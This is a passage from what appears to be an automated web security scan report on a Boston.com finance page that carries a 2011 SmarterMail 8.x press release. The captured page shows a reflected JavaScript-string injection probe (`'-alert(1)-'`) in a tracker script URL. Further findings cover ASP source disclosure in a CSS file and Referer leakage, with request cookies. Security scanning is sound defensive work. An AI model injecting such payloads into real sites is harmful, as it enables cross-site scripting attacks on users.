<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<div class="widget">
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/news/newsread1.css);</style><div class="newsread clearfix">
<div class="title" id="newsItemTitle">SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference</div>
<div class="titleattributes clearfix">
<div class="pubdate"><div class="span date">Tuesday March 15, 2011 - 06:15 AM EDT</div></div>
<div class="channel"><a href="http://finance.boston.com/boston/news/channelinfo?ChannelID=3191">Business Wire News Releases</a></div>
<div class="releasedBy">Released By <a href="http://finance.boston.com/boston/news/releasedby?ReleasedBy=SmarterTools+Inc.">SmarterTools Inc.</a></div>
</div>



<div class="floatright">

<div class="fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>

<div class="sidebar clearfix">

<div class="companylogo"><img src="http://rss.financialcontent.com/images/feed/150px/2/72/272846.img" /></div>




<div class="share">
<div class="span label">Share:</div>
<!-- AddThis Button BEGIN -->
<script type="text/javascript">var addthis_pub="mdierolf";</script>
<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
<!-- AddThis Button END -->
</div>
<script type="text/javascript">
zoomLevel = 100;
</script>
<!--DOCUMENT NEWSENGINE TOOLS-->
<div class="mediatools">
<div class="mediatool" style="display:none">
<div class="label">Text Size:</div>
<div class="icon_txt_enlarge"><a href="#" onclick="zoomLevel += 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
<div class="icon_txt_shrink"><a href="#" onclick="zoomLevel -= 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
</div>




</div>
</div>

</div>




<div class="body" id="news_body">
<div id="mediaZoom">
<span xmlns="http://www.w3.org/1999/xhtml"><span><span/></span><span><p>
SmarterTools Inc. is proud to announce the release of SmarterMail 8.x, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=a+Microsoft+Exchange+alternative&amp;index=1&amp;md5=7d76eda161427115af85fc945239bff9" popable="true" rel="nofollow">a
Microsoft Exchange alternative</a> for any business. The latest release
of their popular <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=mail+server+software&amp;index=2&amp;md5=b564c275a54066759223e738b508bd55" popable="true" rel="nofollow">mail
server software</a> focuses on enhancing the user experience with
touch-and-go functionality, improved contact sharing, enhanced signature
options, new message notifications, password strength enforcement for
administrators and much more.
</p><p>
...The last few releases of the SmarterMail have centered on enhancing the
user experience,... said Tim Uzzanti, CEO of SmarterTools. ...With
SmarterMail 7.x we redesigned and simplified our webmail interface,
introduced the synchronization center and file storage, and improved
mailbox searching. With SmarterMail 8.x, we...ve continued to fine-tune
and simplify the user experience while adding even more functionality to
our award-winning mail server....
</p><p>
New features and enhancements in SmarterMail 8.x include:
</p><ul><li><b>Touch-and-go functionality</b> ... Emailing a contact, mapping an
address or adding an email address to your contacts list has never
been easier. SmarterMail 8.x introduces clickable addresses, phone
numbers and email addresses for click-to-map, click-to-call and
click-to-mail functionality in messages, contact details, calendar
items, tasks and notes.
</li><li><b>Improved contact sharing</b> ... Users can now download, save or send
contact details in .CSV or vCard format, making it easy to share the
email address or phone number of a friend or colleague in their
SmarterMail address book.
</li><li><b>New message notifications</b> ... Now users receive a notification
that they...ve received a new message no matter which section of the
interface they are viewing.
</li><li><b>Built-in filters for viewing messages</b> ... View read messages,
unread messages, replied to messages, forwarded messages or all
messages with attachments with the click of the mouse.
</li><li><b>Synchronization Center Translation </b>... The synchronization center
now detects the browser language and automatically translates the sync
info into that language, making it easier to provide info about
available sync protocols to international users.
</li><li><b>Password retrieval and compliancy options</b> ... When enabled, users
that can...t remember their password will receive an email to their
backup email address with instructions on resetting their password.
Plus, system administrators can use the new password compliance report
to identify users that don...t meet the specified password requirements
and send them a request to change their passwords.
</li><li><b>Improved performance </b>... Numerous optimizations to SmarterMail
8.x reduce disk I/O by an average of 25%. This includes better grid
controls, improved charting and an update to the Microsoft .NET 4.0
Framework.
</li><li><b>Improved administration </b>... With better spool management,
enhancements to IP binding settings, hard limit throttling and support
for SPF RR lookups, mail server administration is easier and more
convenient. Plus, system administrators have access to even more Web
services.
</li></ul><p>
SmarterMail is available at the SmarterTools website and through <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fpartners%2Fpartner-programs.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=authorized+resellers&amp;index=3&amp;md5=eecda7962c7be742b82516312b289374" popable="true" rel="nofollow">authorized
resellers</a>. A complete list of new features and improvements is
available by viewing the <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Freleasenotes%2Fv8.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=SmarterMail+8.x+release+notes&amp;index=4&amp;md5=c659640f16082fef51f6291b3a607ccb" popable="true" rel="nofollow">SmarterMail
8.x release notes</a>.
</p><p>
Follow us on Twitter: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Ftwitter.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=%40smartertools&amp;index=5&amp;md5=c9f7577c4e2744f5a5eb2eced46ec764" popable="true" rel="nofollow">@smartertools</a></p><p>
Watch our videos on YouTube: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;index=6&amp;md5=49ce4902c30a8a3499da6a058636f483" popable="true" rel="nofollow">http://www.youtube.com/smartertools</a></p><p>
Read our blog: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fblog.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fblog.smartertools.com&amp;index=7&amp;md5=f09b9ee5597016741dc2a3d48b77903a" popable="true" rel="nofollow">http://blog.smartertools.com</a></p><p>
About SmarterTools Inc.
</p><p>
Founded in 2003, SmarterTools Inc. is an information technology
management software company based in Phoenix, Arizona. SmarterTools
develops a <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Windows+mail+server&amp;index=8&amp;md5=753dfcf21359acd124f726ecf17ba3d3" popable="true" rel="nofollow">Windows
mail server</a>, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartertrack%2Fhelp-desk-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=customer+service+software&amp;index=9&amp;md5=3858e9ddaccf462e4a8dea61fcdcfbb6" popable="true" rel="nofollow">customer
service software</a>, and <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmarterstats%2Fweb-analytics-seo-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Web+log+analytics+and+SEO+software&amp;index=10&amp;md5=ee1830947b29223ebfa4d4bd225e4e56" popable="true" rel="nofollow">Web
log analytics and SEO software</a> that help companies communicate,
measure, and support their worldwide business operations. Additional
information about SmarterTools Inc. and the SmarterTools product line is
available at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=www.smartertools.com&amp;index=11&amp;md5=45670fe0032c618fc71f4715ff97e2fc" popable="true" rel="nofollow">www.smartertools.com</a>.
</p><p>
Microsoft Exchange and Windows are trademarks of Microsoft Corporation [<a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.marketwatch.com%2Fquotes%2Fmsft&amp;esheet=6647089&amp;lan=en-US&amp;anchor=MSFT&amp;index=12&amp;md5=ca906155f80a16d742609363657b0485" popable="true" rel="nofollow">MSFT</a>].
</p><p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&amp;sty=20110315005734r1&amp;sid=6434&amp;distro=ftp"/><span/></p></span></span> </div>
</div>
<script type="text/javascript">
function scanBody () {
document.FCON.loadLibraryCallback('HoverQuote', function() {
document.FCON.HoverQuote.scanTags(document.getElementById('news_body'));
});
}
setTimeout("scanBody()",50);
</script>

<div class="data contacts">
Contacts: <br /><br />
<fc:contacts xmlns="http://www.w3.org/1999/xhtml"><b>SmarterTools</b><br/>Derek Curtis<b>, </b>VP of Marketing,
623-434-8050<br/><a href="mailto:dcurtis@smartertools.com">dcurtis@smartertools.com</a></fc:contacts>
</div>


<div class="mediatool icon_print"><a href="#" onclick="window.print(); return false;">Print this story</a></div>
<div class="mediatool icon_email"><a href="#" onclick="emailAFriend(document.getElementById('newsItemTitle'),location.href,document.getElementById('newsItemTitle').innerHTML); return false;" >Email this story</a></div>
<div class="mediatool icon_pdf"><a href="http://finance.boston.com/boston/action/getnewspdf?GUID=17744398">Download PDF</a></div>
</div>



</div>

</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398%26e2cff'-alert(1)-'e4c1d21a320%3D1&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




2. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://finance.boston.com
Path:   /widget/privatelabel/news/newsread1.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /widget/privatelabel/news/newsread1.css HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
Referer: http://finance.boston.com/boston/news/read?GUID=17744398
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:40:32 GMT
Server: nginx/0.8.15
Content-Type: text/css
Last-Modified: Mon, 11 Oct 2010 19:31:24 GMT
ETag: "2fa5f-2069-4925c67dc9b00"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 16 Mar 2011 23:40:32 GMT
Age: 263
X-Cache: HIT from squid1.sv1.financialcontent.com
X-Cache-Lookup: HIT from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 8297

/* NewsRead */
#bwbodyimg {
display: none;
}
.invc .newsread .title {
font-size: 160%;
line-height: 135%;
display: inline;
font-weight: bold;
}

.invc .newsread .titleattributes{
text-align: left;
line-height: 125%;
padding: 8px 0px 12px 0px;
color: #444444;
}
.invc .newsread .titleattributes .pubdate .date{
font-weight: bold;
}
.invc .newsread .titleattributes .channel A{
font-weight: bold;
float: left;
}
.invc .newsread .titleattributes .releasedBy{
float: right;
font-size: 90%;
font-style: italic;
line-height: 175%;
}
.invc .newsread .titleattributes .releasedBy A{
display: inline;
}
.invc .newsread .description {
cursor: text;
font-size: 110%;
line-height: 125%;
font-weight: bold;
margin-bottom:10px;
margin-top:0px;
text-align:left;
}
.invc .newsread .body {
cursor: text;
}
.invc .newsread .body P {
font-size:110%;
line-height: 125%;
margin-bottom: 7px;
}

.invc .newsread .body A, .invc .newsread .body A:hover, .invc .newsread .body A:visited {
display: inline;
cursor:pointer;
cursor:hand
}
.invc .newsread .body A:hover {
text-decoration: underline;
}

/* For Podcasts? */
.invc .newsread .player {
padding: 5px;
}

/* FLOAT RIGHT */
.invc .floatright {
float:right;
margin-left:10px;
margin-bottom:10px;
margin-top:0px;
width:300px;

}
/* newsread FCADUnit */
.invc .invcadunit {
width:300px;
height:250px;
}


/* SIDEbar tools CSS */
.invc .sidebar {
background-color: #EEEEEE;
border:1px solid #D1D1D1;
margin-left: 0;
margin-bottom: 0;
margin-top:10px;
width:278px;
padding: 10px;
}

.sidebar .rating, .invc .sidebar .share {
float: left;
line-height: 20px;
}
.invc .sidebar .rating {
margin-left: 25px;
}
.invc .sidebar .companylogo{
padding:10px;
background-color: #FFFFFF;
border:1px solid #D1D1D1;
margin-bottom: 10px;
text-align: center;
}
.invc .sidebar .companylogo IMG{
margin: 0 auto;
padding: 0;
}
/* BOTTOMBar tools CSS */
.invc .bottombar {
background-color: #EEEEEE;
border:1px solid #D1D1D1;
margin-bottom:10px;
margin-top:10px;
padding: 10px;
line-height: 20px;
}
.invc .bottombar .tickers a{
display: block;
float: left;
width: 165px;
height: 25px;
line-height: 25px;
overflow: hidden;
margin-right:10px;
padding-left:20px;
background:url(http://images.financialcontent.com/studio-6.0/icons/16x16/line-chart.png) no-repeat 0 50%;
}






/* MEDIA TOOL ICONS */
.mediatool {
margin-left: 15px;
display: block;
float: left;
}
.mediatool a{
font-weight:bold;
vertical-align:middle;
line-height: 30px;
padding-left: 30px;
}
.icon_print a{
background:url(http://images.financialcontent.com/studio-6.0/icons/24x24/printer2.png) no-repeat 0 50%;
}
.icon_email a{
background:url(http://images.financialcontent.com/studio-6.0/icons/24x24/mail_forward.png) no-repeat 0 50%;
}
.icon_pdf a{
background:url(http://images.financialcontent.com/studio-6.0/icons/24x24/pdf.png) no-repeat 0 50%;
}



.icon_alert a{
background-image: url(<% $IMAGEBASE %>/media/icon_alert.gif);
background-repeat: no-repeat;
background-position: 0px 5px;
padding-left: 35px;
}
.icon_alert a:hover{
background-image: url(<% $IMAGEBASE %>/media/icon_alert_over.gif);
}
.icon_share a{
background-image: url(<% $IMAGEBASE %>/media/icon_share.gif);
background-repeat: no-repeat;
background-position: 0px 3px;
padding-left: 22px;
}
.icon_share a:hover{
background-image: url(<% $IMAGEBASE %>/media/icon_share_over.gif);
}
.icon_txt_enlarge, .icon_txt_shrink{
float:left;
}
.icon_txt_enlarge a{
background-image: url(<% $IMAGEBASE %>/media/icon_txtenlarge.gif);
background-repeat: no-repeat;
background-position: 5px 5px;
padding-left:25px;
}
.icon_txt_enlarge a:hover{
background-image: url(<% $IMAGEBASE %>/media/icon_txtenlarge_over.gif);
background-repeat: no-repeat;
background-position: 5px 5px;
text-decoration:none;
}
.icon_txt_shrink a{
background-image: url(<% $IMAGEBASE %>/media/icon_txtshrink.gif);
background-repeat: no-repeat;
background-position: 5px 5px;
padding-left:25px;
}
.icon_txt_shrink a:hover{
background-image: url(<% $IMAGEBASE %>/media/icon_txtshrink_over.gif);
background-repeat: no-repeat;
background-position: 5px 5px;
text-decoration:none;
}










.metadata .title{
margin-bottom:5px;
margin-top:5px;
}

.metadata .channel, .metadata .pubdate, .metadata .tickers{
margin-bottom:0px;
}
/* END newsread */








.itemRating IMG {
display:inline;
}

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

